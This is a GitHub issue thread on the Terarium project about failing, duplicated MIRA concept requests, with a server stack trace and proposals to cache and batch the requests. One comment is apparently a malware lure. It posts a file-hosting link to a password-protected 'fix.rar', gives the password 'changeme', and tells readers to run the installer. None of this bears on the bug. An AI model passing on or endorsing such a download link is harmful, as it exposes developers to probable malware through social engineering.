### ISSUE TITLE
[BUG]: Group Mira Requests

### ISSUE THREAD

**Issue by mwdchang** [DARPA-ASKEM/terarium#4588]
### Summary
We are observing quite a decent amount of MIRA fetching concept errors, for example

https://app.staging.terarium.ai/projects/34e7b955-f408-4e8b-be27-9429480ad6aa/model/7508b278-caea-4d35-bb17-097bdd463f07

Which makes a bunch of MIRA queries

```
http://localhost:8080/api/mira/currie/ido:0000514?project-id=34e7b955-f408-4e8b-be27-9429480ad6aa
```

This is particularly egregious for stratified models, where many states share the same concepts, and we are sending and failing the same requests dozens of times.  Resulting in traffic jam and dozens of error toasters.

<img width="505" alt="image" src="https://github.com/user-attachments/assets/b377d289-0941-418b-bab3-3fcc02930b59">

Stack trace server side
```
2024-08-27 00:15:55 [ERROR] An unknown error occurred while MIRA was trying to determine concepts based on curies: ido:0000511 [software.uncharted.terarium.hmiserver.controller.mira.MiraController:394]
2024-08-27 00:15:55 [ERROR] An unknown error occurred while MIRA was trying to determine concepts based on curies: ido:0000514 [software.uncharted.terarium.hmiserver.controller.mira.MiraController:394]
2024-08-27 00:15:55 [ERROR] Servlet.service() for servlet [dispatcherServlet] in context with path [] threw exception [Request processing failed: java.lang.IllegalArgumentException: HttpStatusCode is required] with root cause [org.apache.catalina.core.ContainerBase.[Tomcat].[localhost].[/].[dispatcherServlet]:175]
java.lang.IllegalArgumentException: HttpStatusCode is required
	at org.springframework.util.Assert.notNull(Assert.java:204)
	at org.springframework.http.ProblemDetail.forStatus(ProblemDetail.java:281)
	at org.springframework.web.server.ResponseStatusException.<init>(ResponseStatusException.java:94)
	at org.springframework.web.server.ResponseStatusException.<init>(ResponseStatusException.java:79)
	at org.springframework.web.server.ResponseStatusException.<init>(ResponseStatusException.java:56)
	at software.uncharted.terarium.hmiserver.controller.mira.MiraController.handleMiraFeignException(MiraController.java:402)
```

### Task
- Investigate why we are erroring out, perhaps we didn't set up the environment up properly or maybe the external MIRA service is no longer running
- Consider caching the request so we don't kill the server. See `simulation-service` which use a promise based FIFO-cache
- Consider batching the requests and consolidate into a single error message instead of several dozens of error messages

**Comment by mayank785** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Tom-Szendrey** [comment]
also check why we are not getting mira is unavailable error message
